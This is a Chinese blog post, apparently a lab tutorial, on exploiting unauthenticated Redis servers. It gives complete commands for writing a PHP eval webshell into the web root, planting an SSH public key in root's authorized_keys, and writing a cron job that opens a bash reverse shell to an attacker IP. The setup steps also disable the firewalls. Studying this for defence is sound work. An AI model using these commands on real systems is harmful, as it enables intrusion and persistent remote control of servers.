redis未授权访问--拿webshell以及实现ssh免密登录

最新推荐文章于 2024-06-22 21:21:09 发布
最新推荐文章于 2024-06-22 21:21:09 发布
阅读量686 收藏 2
点赞数
分类专栏: 渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Networknovice/article/details/132591235
版权

redis未授权访问–拿webshell以及实现ssh免密登录

前言:

redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;
提供多种语言的 API,java/c/c++/c#/php/javascript/

漏洞定义:
redis未授权访问漏洞是一个有域redis服务器版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器
的IP地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用

漏洞成因:
1.redis版本 4.x/5.0.5或以前的版本

  1. redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则,避免其他飞信人来源IP访问等相关安全策略,直接暴露在公网
  2. 没有设置密码认证(一般为空),可以免密码远程登录redis服务。

漏洞危害:
攻击者 可通过redis命令向网站目录写入webshell,完成对目标网站服务器的初步控制
最严重,如果redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

漏洞的验证及利用过程演示
实验环境准备
1.攻击机和目标机都安装好具有redis服务的linux环境
2.关闭两台实验机器的防火墙,保证后续通信可达
iptables -F
setenforce 0
systemctl stop firewalld.service
3.两台机器IP地址

靶机搭建可以参考:https://blog.csdn.net/qq_39135287/article/details/83474865

**注意:**在搭建靶机的时候redis不要设置密码,因为现在复现的是redis未授权访问。

漏洞验证
验证思路:
未授权访问漏洞的本质就是不需要用户密码就可以完成服务器的登录,所以验证思路很简单,只要能使用攻击机无密码登录目标服务器,漏洞就存在
验证过程
目标机器:/root/local/bin/redis-server /root/redis-4.0.14/redis.conf 运行redis服务器
攻击机器:redis-cli -h IP 连接redis服务器
登录之后输入info,出现内容证明验证成功

漏洞利用方法1–webshell

(目标主机必须开启web服务才可以实现此攻击)

首先攻击机用命令 redis-cli -h 目标IP -p 6379(redis服务的端口) 连接redis服务

config set dir /var/www/html 

<!--这个是设置文件存储的目标目录-->

config set dbfilename shell.php

<!--这个是设置目标文件也就是要创建的后门文件-->

set webshell "<?php  @eval($_POST['cmd']);?>"
<!--这个是将一句话木马写入刚才创建的后门文件里,webshell 就是redis中的键,类似于MySQL中的字段-->
save
注意:一定要save保存!

演示步骤:

连接redis

image-20230829214417072

执行上述步骤

用蚁剑连接成功,成功拿到webshell

漏洞利用方法2–ssh免密登录

写SSH公钥实现登录
攻击机和靶机打开 SSH服务  systemctl start ssh(没有的话用apt命令安装)
在目标机创建SSH公钥可写目录 mkdir /root/.ssh   //ls -al
清空攻击机/root/.ssh目录下的文件,方便区分一会要生成并存放进其中的SSH公钥文件:rm -rf*
在攻击机生成SSH公钥(需要连续敲击三下回车)ssh-keygen -t rsa
在攻击机上切换至公钥存放目录:cd /root/.ssh
将公钥写入1.txt(前后用\n,避免和redis里其他缓存数据混合,不用会一直失败)
(echo -e "\n\n";cat id_rsa.pub;echo -e"\n\n")>1.txt
使用redis-cli -h 目标IP 连接目标机器并执行以下命令将本地SSH公钥写入目标机
config set dir /root/.ssh ——————用来设置redis默认存储目录
config get dir  ——————查看目录设置是否成功
config set dbfilename authorized_keys ——————设置redis要写入哪个文件
save
将1.txt的文本内容带入登录目标机redis服务器的过程中,后续可以直接在目标机上设置目标文件并写入 cat 1.txt | redis-cli -h 目标IP -x set crack  ————————将1.txt中的数据写入authorized_keys这个文件
在攻击机使用ssh免密登录
cd /root/.ssh
ssh -i id_rsa root@目标IP

演示:在攻击机上生成公钥和私钥

在这里插入图片描述

将公钥写进1.txt避免与redis其他数据混淆

image-20230830163824853

连接目标机器的redis服务

image-20230830164456752

image-20230830164705861

目标机器已经被写入文件

image-20230830165525906

用攻击机成功登陆场目标机器

image-20230830165503446

漏洞利用方法3–反弹shell

利用攻击机将计划任务写进服务器
config set dir /var/spool/cron  //写入的目录  计划文件夹
config set dbfilename root     //写入的文件名
set ssr "\n* * * * * bash -i >& /dev/tcp/192.168.20.140/1234 0>&1\n"      //写入的内容
save
攻击机:执行 nc -lvvp 1234   稍等片刻   黑客机接收到目标机的shell 使用crontab -l 可查看目标机器原来写入的计划任务

演示:

image-20230830191428843

image-20230830191450162

成功反弹shell

image-20230830191517742

Xiaolisec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3128
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis攻防-ssh登录、主从复制、授权访问、计划任务、写webshell
weixin_46626737的博客
06-30 646
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行写数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
web中间件漏洞-Redis漏洞授权访问漏洞-写webshell、写ssh公钥
最新发布
Alsn86的博客
06-22 302
利用redis授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
Redis webshell详解
m0_54313550的博客
04-19 464
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
Redis-密钥登录ssh,免密码
weixin_54227009的博客
06-06 1861
1、在kali上生成密钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无密码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的密钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥写入key.txt中将key.txt导入进目标机器cat
linux7安装redis7.2.3以及使用ssh方式远程连接redis教程
12-11 805
9.使用redis desktop manager工具以ssh方式远程连接redis。4.复制redis.conf配置文件到安装目录并修改为以后端模式启动。2. 上传到linux服并解压。5.启动redis并查看进程。6.客户端访问redis。3.编译并设置安装目录。
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
Redis稳定版 Redis-x64-5.0.14.1.zip
07-21
本次提供的版本是Redis的稳定版——Redis-x64-5.0.14.1,针对64位操作系统设计。在深入探讨Redis之前,我们先了解下Redis的基本特性。 1. **数据类型**: Redis支持五大数据类型:字符串(String)、哈希(Hash)、列表...
Redis-x64-5.0.14.msi和Redis-x64-5.0.14.zip
12-20
解压后,你可以找到包括`redis-server.exe`、`redis-cli.exe`等在内的可执行文件,以及配置文件`redis.conf`。这种方式适合于需要自定义配置或手动管理服务的用户。通过编辑`redis.conf`,你可以调整Redis的各项参数...
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5436
redis授权访问复现,含写入webshelllinux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis无密码登录
m0_54861649的博客
04-22 2599
redis的配置文件redis.conf中,Redis3.2加入的新特性,开启保护模式。即开启了protected-mode,默认值为 protected-mode =yes 是说redis只允许本机登录。 这样登录的前提是要设置密码,即要requirepass属性, requirepass =你设置的密码 如要无密码登录,就要设置protected-mode =no ,即可 ...
Redis攻防(授权访问、利用redis写入webshell、任务计划反弹、Shellssh-keygen 公钥登录服务器、利用主从复制RCE)
Love&Share
12-13 8889
文章目录授权访问利用redis写入webshell任务计划反弹Shellssh-keygen 公钥登录服务器利用主从复制RCEwindowsSSRF安全设置 REmote DIctionary Server(Redis) 是一个 key-value 存储系统,是跨平台的非关系型(Nosql)数据库 关于Redis可以看菜鸟教程: https://www.runoob.com/redis/redis-tutorial.html 授权访问 主要是因为配置不当,导致授权访问漏洞,进一步将恶意数据写入内.
Redis授权访问ssh免密登录(踩坑)
Zlirving_的博客
06-29 4429
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
Redis授权访问漏洞(四)SSH key免密登录
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-10 863
步骤一:我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器。然后回到我们攻击机的.ssh目录下,注意这一步必须在.ssh目录下执行,不然会找不到文件的。发现两个文件的内容居然是一样的,那么现在我们是不是可以实现ssh-key免密登录了?好了,ssh-key免密登录的流程已经复习完毕了,正式进入我们的实战试验吧。注意:生成的目录是.ssh,是一个隐藏的目录。我们的靶机上出现了刚刚我们从客户端传来的文件。这里让我们输入靶机root用户的密码。
redis授权写入ssh公钥登录
m0_46576302的博客
09-09 3760
利用redis的备份功能,写入ssh公钥
用户登录(免密登录redis
weixin_45175767的博客
07-02 1245
文章目录一、功能介绍二、使用步骤1.RedisTemplate序列化类2.具体实现3.在网关设置过滤总结 一、功能介绍 (需要用到redis数据库来实现免密登录和定时登出,可以配置一个自己的redis。) 用户登录一次以后,设置指定时间再次登录不需要验证 redis可以设置数据缓存时间,数据以kv形式存取。 这里还需用到过滤器,如果token还存在,就放过,如果不存在,就过滤。 二、使用步骤 1.RedisTemplate序列化类 代码如下(示例): @Configuration public cla
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值